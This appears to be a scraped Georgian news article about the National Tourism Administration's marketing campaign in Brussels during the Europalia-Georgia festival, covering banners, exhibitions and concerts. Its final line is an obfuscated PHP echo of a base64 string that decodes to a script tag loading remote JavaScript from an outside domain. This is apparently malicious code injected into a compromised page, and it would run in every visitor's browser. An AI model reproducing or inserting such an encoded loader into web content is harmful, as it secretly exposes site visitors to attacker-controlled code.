celsiusi
ავერსი შნაიდერი

 ფესტივალ „ევროპალია-საქართველოს“ ფარგლებში საქართველოს ტურიზმის ეროვნული ადმინისტრაცია ბრიუსელში მარკეტინგულ კამპანიას ატარებს.

ტურიზმის ეროვნული ადმინისტრაციის ინფორმაციით, საქართველოს მთავრობის მხარდაჭერით, მიმდინარე წლის 4 ოქტომბრიდან 2024 წლის თებერვლის ჩათვლით, ბელგიასა და მის მოსაზღვრე ქვეყნებში 60-ამდე მასშტაბური და მრავალფეროვანი ღონისძიება იმართება. კამპანიის ფარგლებში, ბელგიის დედაქალაქის საზოგადოებრივ ტრანსპორტში საქართველოს ტურისტულად მიმზიდველი ადგილების შესახებ ბანერები განთავსდა.  ავტობუსები და ტრამვაი საქართველოს სარეკლამო ფოტოებით გაფორმდა. ბრიუსელის საერთაშორისო აეროპორტში საქართველოს ტურისტული მიმართულების შესახებ ლედეკრანები და სტატიკური ბანერი განთავსდა. ბრიუსელის აეროპორტი ერთ-ერთი ყველაზე დატვირთული აეროპორტია ევროპაში, აეროპორტმა შარშან 19 მილიონამდე მგზავრი მიიღო.

1703229348 412841593 757903569713785 4126869780828356798 n

ბელგიაში მიმდინარე კამპანიის მიზანია, ევროპის ქვეყნებში საქართველოს შესახებ მეტი ინფორმაციის გავრცელება, ტურისტული პროდუქტების წარდგენა და უცხოელ ტურისტთა მოზიდვა.

1703229226 6e1fb641 3067 4f00 afb4 22d69bff070f

ფესტივალ „ევროპალია-საქართველოს“ სტუმრებს საშუალება აქვთ, გაიცნონ საქართველოს როგორც ტრადიციული, ასევე თანამედროვე კულტურული მრავალფეროვნება. მიმდინარეობს ორი მასშტაბური და ისტორიული მნიშვნელობის გამოფენა – „ავანგარდი საქართველოში – 1900-1936“ (ბრიუსელის ნატიფი ხელოვნების ცენტრ „ბოზარში“) და „საქართველო – შეხვედრების ადგილი“ (ბრიუსელის ისტორიისა და ხელოვნების სამეფო მუზეუმში). მრავალფეროვანი საფესტივალო პროგრამა ასევე მოიცავს თეატრალურ წარმოდგენებს, ლიტერატურულ შეხვედრებსა და ქართული კინოს რეტროსპექტივას, თანამედროვე ქართველი არტისტების პერსონალურ გამოფენებს, მულტიდისციპლინურ პერფორმანსებს, ტრადიციული, პროფესიული და თანამედროვე ელექტრონული მუსიკის კონცერტებს.

1703229350 412852154 757903703047105 8869208571470683419 n

„ევროპალია-საქართველოს“ ფარგლებში გამართულ ღონისძიებებს განსაკუთრებული მნიშვნელობა აქვს ქართული კულტურის საზოგადოებისთვის წარდგენისა და ევროინტეგრაციის ხელშეწყობისთვის“, – – ნათქვამია ტურიზმის ეროვნული ადმინისტრაციის ინფორმაციაში.

369
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");